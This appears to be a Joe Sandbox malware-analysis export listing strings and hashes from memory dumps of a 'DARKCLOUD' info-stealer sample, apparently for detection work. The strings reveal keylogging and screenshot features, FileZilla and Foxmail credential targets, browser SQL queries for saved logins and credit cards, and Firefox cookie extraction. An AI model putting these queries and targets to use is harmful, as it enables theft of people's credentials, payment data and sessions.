Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID: 013F130F18$031A131500020622566853$072305103E$0E01003A033D22671027310935$12283A02321C16344C7E51$162C02333934231F$17091A210C0D31200B380207033D2F0301$1739330A3B07053B131B0F071F1E183E78220B082E$1C123A1F3A1D0706320739$22283A3C1B35112F$23051C3F142E3B4A2D0F0D$23172622220E3D2B09373E33112B$23211A2A2E39031C0B3C2C6F536901071703061C1F$2404083105010521471D051E$270D0B33222806270D342B163D282A$2A381F1A1F$2B0F0D1324001C1F3D3125240529140C015E192C0751$3A0C1206163C20027E112A0A48$===============DARKCLOUD===============$@$AejdRuGWdHwhHBpojiHLXZdctJmTbHTJ$C:\\$CopyFile$EbcjQNMUNjZJbHZOFGpurNeQdUOCMGSXQJXYefigD$ElbREMgSLZRLEtYGbIrffgi$Foxmail$FrIIOlZcKvJrdXFxrrQLatXXQPBZzuUx$FxEkRjtkUinqyOvbawXjNRhPynphfAyhO$HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Foxmail.url.mailto\Shell\open\command\$HVivgnckGvRsRU$IbQjFGZbhbSBOiIGhoNgus$MlhcvFVmIMjFqOgZRtkmRqOJwhJbvomHU$OGlhHciXCHPgdhiFnddYdgN$QKxPixabgRxlhjplMVVoiZWMEKdOvJZJRhDlJyomx$RegRead$Scripting.FileSystemObject$Url : $VDRrftxweScZOeNRIryzoTWpKsIRpqHwZ$WSgNxUtiaaTusZeImMdnWspumBJaHZJcCw$XEXmAXSFCYQXYpdJIeEWNpGW$dwNnpKurkNmdGfFabupkIdaqSbIdQTnX$eYRcHjMVICOT$mCBqqbcWhWxETdslhQIYoBtANgPVScILIsRcmhinggB$pBIIqEsdPlDqPlOuGTRvmiGmuchxGZMGHTGFaaIudBr$pfMqeyINvPcOixFPoIyVWcFYQBeeUngrl$tGYvvCoxBUIrlWeBAbspIkifTaMPPAExx
API String ID: 0-3562784849
Opcode ID: faab61657d9eba418df29a2d01d2498d33dc0408eded7a53f3fe14d22d8f6cbf
Instruction ID: 6b8a15204438c86ed8a95272a29ac8c5957484cdf9bf360818a9a4bc2401bab9
Opcode Fuzzy Hash: faab61657d9eba418df29a2d01d2498d33dc0408eded7a53f3fe14d22d8f6cbf
Instruction Fuzzy Hash: 5D13F875A00218DFDB24DF60DD88BDEB779BB48304F1081EAE50AB6260EB745B89CF55

Function 0040F440 Relevance: 48.2, Strings: 37, Instructions: 1951COMMON

Download Yara Rule

Strings

31006B092E303634171D111D0B, xrefs: 004107ED
DXXuZPtFhondFBXdJuouXXNThQaRlZD, xrefs: 00410875, 004110D0
242D291A24103127, xrefs: 0040FFFB
ntYJDEuDIrnNYYYdTSImaLyNMbtVWJUj, xrefs: 004103C0
Remove, xrefs: 0041118A
173B001726332E2A, xrefs: 00410206
rCyTVoiqsUNwEMbuttbPvdXylgyYMXqNO, xrefs: 00410463
001A1924382A1816, xrefs: 0041009E
081C2D120E1D10, xrefs: 00410441
cAaZaPNiyyGaTTavjDwSYsQLKBKshhaepY, xrefs: 00410163
0C38240327, xrefs: 00410587
QGvOiCWEQFcIEEuTtfojVvW, xrefs: 0040FF7A
DC-SC, xrefs: 004111EA
ciHZiEwTTCBUmvkjIFDBFouIEtnVBLYW, xrefs: 0041001D
6:@, xrefs: 00410741
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 0040F54E, 0040FBBC
pUnaLwEsVmkGcweXpdooR, xrefs: 0040F55C
TnYCAzdjcQGm, xrefs: 00410228
22133F0535201D10182B12, xrefs: 00410141
nJQHfTiYjEvrbDtdfCRMwZBOeTFJpSfeE, xrefs: 004105A9
2D160E112F302F311F062011, xrefs: 004101E4
1B3020343D3E3115210E0B3836, xrefs: 004104E4
MgBEYGSBAexSrsCosGapgabSXuGhmqIQeretgysOxb, xrefs: 00410831
2831160E35193638060D3B19, xrefs: 0041080F, 004110AE
041920022A3236, xrefs: 0040FF58
7B1A1938, xrefs: 0040F505
DC-KL, xrefs: 0040F667
gXBYDIQftMbnLEuPrkdvW, xrefs: 00410506
lBhEEhrcobfPgvjWQkGIUBxdeSOqasPbR, xrefs: 0041028E
\Screenshot, xrefs: 0040FBD1
273A3821201B37211D1A, xrefs: 0041039E
gSzQgzUVhRXMbtcGggTehdsSnHcYHDxsSaZubRTbN, xrefs: 0040F527
0F31341E3E342209, xrefs: 0040F4E3
.BMP, xrefs: 0040FC11
TCuwPYIleynnJOtdWuMHDJGgZWsFRXWgGJViSeAeoCc, xrefs: 004100C0
Add, xrefs: 00410957
\KeyData.Log, xrefs: 0040F6EA

Memory Dump Source

Source File: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID: .BMP$001A1924382A1816$041920022A3236$081C2D120E1D10$0C38240327$0F31341E3E342209$173B001726332E2A$1B3020343D3E3115210E0B3836$22133F0535201D10182B12$242D291A24103127$273A3821201B37211D1A$2831160E35193638060D3B19$2D160E112F302F311F062011$31006B092E303634171D111D0B$6:@$7B1A1938$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz$Add$DC-KL$DC-SC$DXXuZPtFhondFBXdJuouXXNThQaRlZD$MgBEYGSBAexSrsCosGapgabSXuGhmqIQeretgysOxb$QGvOiCWEQFcIEEuTtfojVvW$Remove$TCuwPYIleynnJOtdWuMHDJGgZWsFRXWgGJViSeAeoCc$TnYCAzdjcQGm$\KeyData.Log$\Screenshot$cAaZaPNiyyGaTTavjDwSYsQLKBKshhaepY$ciHZiEwTTCBUmvkjIFDBFouIEtnVBLYW$gSzQgzUVhRXMbtcGggTehdsSnHcYHDxsSaZubRTbN$gXBYDIQftMbnLEuPrkdvW$lBhEEhrcobfPgvjWQkGIUBxdeSOqasPbR$nJQHfTiYjEvrbDtdfCRMwZBOeTFJpSfeE$ntYJDEuDIrnNYYYdTSImaLyNMbtVWJUj$pUnaLwEsVmkGcweXpdooR$rCyTVoiqsUNwEMbuttbPvdXylgyYMXqNO
API String ID: 0-2888842672
Opcode ID: 68adb9470b3943b8a3329c360663785a2d378bc581798e6f24ab254762d287a0
Instruction ID: 385d61295a629402eca8f5997857310a24415d24cab89243723d0385ae0fb445
Opcode Fuzzy Hash: 68adb9470b3943b8a3329c360663785a2d378bc581798e6f24ab254762d287a0
Instruction Fuzzy Hash: A3130A75900208DFDB14DFA4D998BDEBBB5FF48304F1081AAE50AB72A0DB745A89CF54

Function 00416743 Relevance: 44.7, Strings: 34, Instructions: 2162COMMON

Download Yara Rule

Strings

143A340202121F00390A382425360438230D111F071733302D2F4B6564663F1E2121271E010312050B3601302B30212A3A0619090A283A1B6E6A4062063F0B6055, xrefs: 00417134
EelOyNuaINcq, xrefs: 00416972
3A2D00371503350E12190406102A38031F262C11081D0D2D1130422C13370D211F17072B3F3A1C20032F0E1D35150F2D060D30186E19081611242C051735501514, xrefs: 00417326
Server, xrefs: 00418DC3, 00419AE7
===============DARKCLOUD===============, xrefs: 004197E4, 0041A491
Application : FileZilla, xrefs: 0041A414
jLZsIKnlnCb, xrefs: 00417543
\Default, xrefs: 00416A8F
14161C200E01390139092978684C1E032A2B3E3F150400, xrefs: 00419676
KYlVwoXaGIujKMypCZDTPFSJxCssVSOx, xrefs: 0041763C
pBIIqEsdPlDqPlOuGTRvmiGmuchxGZMGHTGFaaIudBr, xrefs: 00419698, 0041A39A
\recentservers.xml, xrefs: 00418B96, 00418CCB
\sitemanager.xml, xrefs: 004198B9, 004199EF
173B001726332E2A, xrefs: 00417906
12283A02321C16344C7E51, xrefs: 00419654, 0041A378
34381107392B3615323B3D37180E1E2928003A2425210E34122F7F7C6A4032392120060E022D12241404252E0B32042F013F301C01193F0853525A730D32205B77, xrefs: 0041722D
DC-Creds, xrefs: 00417C96
siBfCbbGkNTmebEKlyRpFa, xrefs: 00417351
YGURvusmeeGQGWYwWEyMPaqZSHszPJVcQTUKqnhNUyYg, xrefs: 0041715F
%, xrefs: 0041A4DE
pUnaLwEsVmkGcweXpdooR, xrefs: 00417A72
TnYCAzdjcQGm, xrefs: 0041797E
0A0330031839132215380B3939101E630A363D3B342A2624141A1D05101F5879053F33041C310E293A, xrefs: 00417611
1F35153D3C0F1E0B1F243E1C0D123B2E322F2111272C180A2F1A221A091D, xrefs: 00417518
r, xrefs: 00417CFF
2D160E112F302F311F062011, xrefs: 004178DB
oUflLgbXuPfGXRlXjFNdVyhabGBKQXI, xrefs: 004196C5
7B1A1938, xrefs: 00417931
lBhEEhrcobfPgvjWQkGIUBxdeSOqasPbR, xrefs: 00417A02
3920201E271B410D2F1710, xrefs: 00416947
GgWwsNJDpnvTTjamFNtfkC, xrefs: 00417258
RPWyhCWXBplEvCZcSaDQy, xrefs: 0041744A
\accounts.xml, xrefs: 004180B3, 004181E9
03381F1C34362A272C212C153135103C07300D2E3B3E33161F30771527031F24112A3404733231330A2B23231C051F072A2D1605291330065A605671123F146063, xrefs: 0041741F

Memory Dump Source

Source File: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID: %$03381F1C34362A272C212C153135103C07300D2E3B3E33161F30771527031F24112A3404733231330A2B23231C051F072A2D1605291330065A605671123F146063$0A0330031839132215380B3939101E630A363D3B342A2624141A1D05101F5879053F33041C310E293A$12283A02321C16344C7E51$14161C200E01390139092978684C1E032A2B3E3F150400$143A340202121F00390A382425360438230D111F071733302D2F4B6564663F1E2121271E010312050B3601302B30212A3A0619090A283A1B6E6A4062063F0B6055$173B001726332E2A$1F35153D3C0F1E0B1F243E1C0D123B2E322F2111272C180A2F1A221A091D$2D160E112F302F311F062011$34381107392B3615323B3D37180E1E2928003A2425210E34122F7F7C6A4032392120060E022D12241404252E0B32042F013F301C01193F0853525A730D32205B77$3920201E271B410D2F1710$3A2D00371503350E12190406102A38031F262C11081D0D2D1130422C13370D211F17072B3F3A1C20032F0E1D35150F2D060D30186E19081611242C051735501514$7B1A1938$===============DARKCLOUD===============$Application : FileZilla$DC-Creds$EelOyNuaINcq$GgWwsNJDpnvTTjamFNtfkC$KYlVwoXaGIujKMypCZDTPFSJxCssVSOx$RPWyhCWXBplEvCZcSaDQy$Server$TnYCAzdjcQGm$YGURvusmeeGQGWYwWEyMPaqZSHszPJVcQTUKqnhNUyYg$\Default$\accounts.xml$\recentservers.xml$\sitemanager.xml$jLZsIKnlnCb$lBhEEhrcobfPgvjWQkGIUBxdeSOqasPbR$oUflLgbXuPfGXRlXjFNdVyhabGBKQXI$pBIIqEsdPlDqPlOuGTRvmiGmuchxGZMGHTGFaaIudBr$pUnaLwEsVmkGcweXpdooR$r$siBfCbbGkNTmebEKlyRpFa
API String ID: 0-3922532718
Opcode ID: a4ec7277a80bb0a62c2bf73e29243e58020374021562dd211d4fee7f666bffa0
Instruction ID: 0e973a34b77d6dc237ca175172b3ee06cfda525befdaf731f62296bd0fefcff3
Opcode Fuzzy Hash: a4ec7277a80bb0a62c2bf73e29243e58020374021562dd211d4fee7f666bffa0
Instruction Fuzzy Hash: 15330475900219DFDB24DF90DD88BEEB7B5BB48300F1081EAE50AB72A0DB745A89CF55

Function 0041C000 Relevance: 42.6, Strings: 32, Instructions: 2595COMMON

Download Yara Rule

Strings

getbinaryvalue, xrefs: 0041C9C4
3E3A361B1F040B0723, xrefs: 0041C9FD, 0041DE15
39351F2F1913240633093E5845062D0329030029, xrefs: 0041CF55
firebirdOONhiVSYquHJwgabling, xrefs: 0041DB8B, 0041FD4C
===============DARKCLOUD===============, xrefs: 0041D1A9
22283A3C1B35112F, xrefs: 0041CA28
fructiferousnesszEPCxWsxJmZdHkXAbATqDlTapJmUUGhOofiremanship, xrefs: 0041DCB2, 0041FEAA
CreateDecryptor, xrefs: 00420663
GGwuAKkseRzHfCtotjmDqsWi, xrefs: 004205A1
TransformFinalBlock, xrefs: 00420763
|Z@, xrefs: 0041C3CE, 0041C4AD
MlhcvFVmIMjFqOgZRtkmRqOJwhJbvomHU, xrefs: 0041FDB2
2F13133B3B1200132200210B2C06071F, xrefs: 0042057F
System.Security.Cryptography.RijndaelManaged, xrefs: 00420474
~, xrefs: 0041FFE6
enumvalues, xrefs: 0041C275
Padding, xrefs: 0042051C
Mode, xrefs: 00420569
FrIIOlZcKvJrdXFxrrQLatXXQPBZzuUx, xrefs: 0041CAE1
GetDWORDValue, xrefs: 0041C7C8
FxEoCppErZfPbeIXwEloBjan, xrefs: 0041CFE7
test, xrefs: 0041DF18, 0041DF66
|Z@, xrefs: 0042005F, 0041DF04
sophiesFMCUxYCNFNMfitfulness, xrefs: 0041DDA0, 0041FFBF
EnumKey, xrefs: 004200D1
AsSUipwdaWzxxUOolnYfQC, xrefs: 0041CA53, 0041DE6C
keySize, xrefs: 004204CF
GetMultiStringValue, xrefs: 0041D9C5
|Z@, xrefs: 0041FB97
Key, xrefs: 0042061C
getstringvalue, xrefs: 0041C5CC, 0041FC09
GetExpandedStringValue, xrefs: 0041D7CC

Memory Dump Source

Source File: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID: 22283A3C1B35112F$2F13133B3B1200132200210B2C06071F$39351F2F1913240633093E5845062D0329030029$3E3A361B1F040B0723$===============DARKCLOUD===============$AsSUipwdaWzxxUOolnYfQC$CreateDecryptor$EnumKey$FrIIOlZcKvJrdXFxrrQLatXXQPBZzuUx$FxEoCppErZfPbeIXwEloBjan$GGwuAKkseRzHfCtotjmDqsWi$GetDWORDValue$GetExpandedStringValue$GetMultiStringValue$Key$MlhcvFVmIMjFqOgZRtkmRqOJwhJbvomHU$Mode$Padding$System.Security.Cryptography.RijndaelManaged$TransformFinalBlock$enumvalues$firebirdOONhiVSYquHJwgabling$fructiferousnesszEPCxWsxJmZdHkXAbATqDlTapJmUUGhOofiremanship$getbinaryvalue$getstringvalue$keySize$sophiesFMCUxYCNFNMfitfulness$test$|Z@$|Z@$|Z@$~
API String ID: 0-3435461623
Opcode ID: 0c9cbf74a0d5222d7ebce274e96f0ebd083e18e37a7b07674e515ded7a58f45f
Instruction ID: 372f6a90fd1cbf4a08f45f787f81261b6261c0f0ba28c5bafbe5346f0947d91d
Opcode Fuzzy Hash: 0c9cbf74a0d5222d7ebce274e96f0ebd083e18e37a7b07674e515ded7a58f45f
Instruction Fuzzy Hash: 9753D4B4900219DFDB54DF54CD88BDDBBB4BB48304F1082EAE50AAB2A1DB749AC5CF54

Function 004215F0 Relevance: 42.4, Strings: 32, Instructions: 2378COMMON

Download Yara Rule

Strings

username_value, xrefs: 004228F9
===============DARKCLOUD===============, xrefs: 00421DFF, 00422467, 0042305B, 00423D3E
\WebData, xrefs: 004216B6
031A131500020622566853, xrefs: 00421A5E, 00422CA5
Name on Card: , xrefs: 0042211F, 00423A66
Web Data, xrefs: 00421685
cIQcgPyaCLuuhXPkgYdIkKlqZurEFKprFYRahTMJqkyB, xrefs: 00422ADD, 004237DF
YCSMLssvpbsNz, xrefs: 00422A81, 00423783
SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards, xrefs: 00421F3C, 00423170
SELECT origin_url, username_value, password_value FROM logins, xrefs: 004218EA
name_on_card, xrefs: 00423647
pBIIqEsdPlDqPlOuGTRvmiGmuchxGZMGHTGFaaIudBr, xrefs: 00421B5A, 00422DA1
12283A02321C16344C7E51, xrefs: 00421A89, 00422CD0
Login Data, xrefs: 0042168A
35627D, xrefs: 00422A2B, 0042372D
card_number_encrypted, xrefs: 0042366F
SELECT origin_url, username_value, password_value, length(password_value) FROM logins, xrefs: 0042250F
grrqJdjTSlWsFQbHmCcsaK, xrefs: 00421D53, 004222EE, 00422FB0, 00423C93
3F6052, xrefs: 00422A56, 00423758
Card Type: , xrefs: 0042232D, 00423BCD
d, xrefs: 00421F88
\LogganchedTSADAsTxnerPUZbggalesaurus, xrefs: 0042165F
CopyFile, xrefs: 00421795, 0042188B
Expiry Date; , xrefs: 0042214E, 00423A95
HVivgnckGvRsRU, xrefs: 00421AEA, 00422D31
Url : , xrefs: 00421ABB, 00422D02
|Z@, xrefs: 004229E6
b, xrefs: 00423E03
Card Number: , xrefs: 00422176, 00423B80
330201260D09352705381D666B42, xrefs: 00421D28, 004222AB, 00422F85, 00423C68
expiration_month\expiration_year, xrefs: 0042365B
Scripting.FileSystemObject, xrefs: 004216D5, 004217CB

Memory Dump Source

Source File: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID: 031A131500020622566853$12283A02321C16344C7E51$330201260D09352705381D666B42$35627D$3F6052$===============DARKCLOUD===============$Card Number: $Card Type: $CopyFile$Expiry Date; $HVivgnckGvRsRU$Login Data$Name on Card: $SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards$SELECT origin_url, username_value, password_value FROM logins$SELECT origin_url, username_value, password_value, length(password_value) FROM logins$Scripting.FileSystemObject$Url : $Web Data$YCSMLssvpbsNz$\LogganchedTSADAsTxnerPUZbggalesaurus$\WebData$b$cIQcgPyaCLuuhXPkgYdIkKlqZurEFKprFYRahTMJqkyB$card_number_encrypted$d$expiration_month\expiration_year$grrqJdjTSlWsFQbHmCcsaK$name_on_card$pBIIqEsdPlDqPlOuGTRvmiGmuchxGZMGHTGFaaIudBr$username_value$|Z@
API String ID: 0-60872368
Opcode ID: 2de882c686f9e05a6e0c94a4d06685555c599f0bc649e62f3c502dfb543d4d31
Instruction ID: 37e1b0618d1c742275d4e0006f99fb65452f2574a4cb0fea8acbaf271a539141
Opcode Fuzzy Hash: 2de882c686f9e05a6e0c94a4d06685555c599f0bc649e62f3c502dfb543d4d31
Instruction Fuzzy Hash: 363307B59002189FDB15DF90DD98BDEB7B8BB48304F0081EAE60AB7260DB745B89CF54

Function 00417F70 Relevance: 35.0, Strings: 26, Instructions: 2467COMMON

Download Yara Rule

Strings

Server, xrefs: 00418DC3, 00419AE7
===============DARKCLOUD===============, xrefs: 00418A32, 004197E4, 0041A491
kDbeHjJMhBpjZ, xrefs: 0041945B, 0041A17F
Application : FileZilla, xrefs: 0041A414
031A131500020622566853, xrefs: 0041841B, 004191F9, 00419F1E
MEEnFdknjQNGs, xrefs: 00418EFA, 00419C1E
okqbLvvHnPxyprbijbnYAgZWwlprrmpAM, xrefs: 00418976
14161C200E01390139092978684C1E032A2B3E3F150400, xrefs: 00419676
pBIIqEsdPlDqPlOuGTRvmiGmuchxGZMGHTGFaaIudBr, xrefs: 00418836, 00419698, 0041A39A
\recentservers.xml, xrefs: 00418B96, 00418CCB
\sitemanager.xml, xrefs: 004198B9, 004199EF
152A1C32, xrefs: 00418ED8, 00419BFC
12283A02321C16344C7E51, xrefs: 004187F2, 00419654, 0041A378
pRTwpUNNIlUihNEGFprqRQyiQIWfhot, xrefs: 0041843D
022618043A2D21254C6F49, xrefs: 004183F9
%, xrefs: 0041A4DE
1E3B2A00, xrefs: 00418E71, 00419B95
KNqZPkWAyKcLwlvUllHWtfmISduhHmG, xrefs: 0041923D, 00419F62
2A0112201F15291A39171750484239030609302F, xrefs: 00418814
1403163B, xrefs: 00419439, 0041A15D
HVivgnckGvRsRU, xrefs: 0041857D, 00419282, 00419FA7
oUflLgbXuPfGXRlXjFNdVyhabGBKQXI, xrefs: 004196C5
1B023F22, xrefs: 0041921B, 00419F40
Url : ftp://, xrefs: 004190F6, 00419E1B
AVTYtUujGTC, xrefs: 00418E93, 00419BB7
\accounts.xml, xrefs: 004180B3, 004181E9

Memory Dump Source

Source File: 00000009.00000002.3286675214.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000402000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000466000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.0000000000468000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.3286675214.000000000046A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_yMvZXcwN2OdoP6x.jbxd

Yara matches

Similarity

API ID:
String ID: %$022618043A2D21254C6F49$031A131500020622566853$12283A02321C16344C7E51$1403163B$14161C200E01390139092978684C1E032A2B3E3F150400$152A1C32$1B023F22$1E3B2A00$2A0112201F15291A39171750484239030609302F$===============DARKCLOUD===============$AVTYtUujGTC$Application : FileZilla$HVivgnckGvRsRU$KNqZPkWAyKcLwlvUllHWtfmISduhHmG$MEEnFdknjQNGs$Server$Url : ftp://$\accounts.xml$\recentservers.xml$\sitemanager.xml$kDbeHjJMhBpjZ$oUflLgbXuPfGXRlXjFNdVyhabGBKQXI$okqbLvvHnPxyprbijbnYAgZWwlprrmpAM$pBIIqEsdPlDqPlOuGTRvmiGmuchxGZMGHTGFaaIudBr$pRTwpUNNIlUihNEGFprqRQyiQIWfhot
API String ID: 0-4289706516
Opcode ID: a715710e24174eb4ce95b79c113e7fbb527458c9df7dc782e70a33763fbe8ba9
Instruction ID: f9ccbf6b37bbde5dc4109242efc3476316296007d487790bbb8f156d31b6e84e
Opcode Fuzzy Hash: a715710e24174eb4ce95b79c113e7fbb527458c9df7dc782e70a33763fbe8ba9
Instruction Fuzzy Hash: 3F43F875900218DFDB14DFA0DD98BEEB7B5FB48300F1081AAE50AB72A4DB745A89CF54

Function 00441003 Relevance: 29.7, Strings: 23, Instructions: 944COMMON

Download Yara Rule

Strings

#, xrefs: 00441FB0
atoiLGEwFeiVHPRRwaFJRpyVNXCUuvihFoAKykoVrs, xrefs: 00441250, 00441415, 00441C61, 00441D5E
"This domain only raw": "false",, xrefs: 00441AE2
SELECT expiry, host, name, path, value FROM moz_cookies, xrefs: 004414D6, 00441E97
"Path raw": ", xrefs: 00441707
"First Party Domain": "", xrefs: 00441B4A
CopyFile, xrefs: 00441337
"Content raw": ", xrefs: 00441784
sdkjDnIeqLkUWnOTlTLZkhBVLcHoDQJv, xrefs: 0044102E, 004411F4
"Host raw": "https://, xrefs: 004415AE
"Store raw": "firefox-default",, xrefs: 00441B16
"Expires raw": ", xrefs: 00441887
3808052B052000026218243B073B31, xrefs: 00441003, 0044119E
"HTTP only raw": "false",, xrefs: 00441A03
"This domain only": "Valid for subdomains",, xrefs: 00441AAE
"Send for raw": "false",, xrefs: 004419CF
d, xrefs: 00441522
"Name raw": ", xrefs: 0044162B
"Send for": "Any type of connection",, xrefs: 0044199B
280C06232C2C12354B0D34, xrefs: 004411C9, 004413EA, 00441C36, 00441D33
"SameSite raw": "no_restriction",, xrefs: 00441A37
Scripting.FileSystemObject, xrefs: 00441167
"Expires": ", xrefs: 00441801

Memory Dump Source

Source File: 00000009.00000002.3286675214.0000000000441000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.3286675214.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
